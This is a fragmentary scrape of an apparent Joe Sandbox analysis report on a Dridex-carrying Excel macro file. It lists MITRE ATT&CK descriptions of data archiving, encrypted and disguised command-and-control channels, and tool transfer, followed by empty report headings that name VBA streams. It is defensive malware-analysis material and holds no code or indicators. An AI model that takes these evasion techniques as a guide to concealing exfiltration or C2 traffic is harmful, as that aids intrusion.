Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report INV8222874744_20210111490395.xlsm

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Dridex

Yara Overview

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "/opt/package/joesandbox/database/analysis/338363/sample/INV8222874744_20210111490395.xlsm"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 3200

General

VBA Code Keywords

VBA Code

VBA File Name: Sheet1.cls, Stream Size: 1627

General

VBA Code Keywords

VBA Code

VBA File Name: ThisWorkbook.cls, Stream Size: 999

General

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre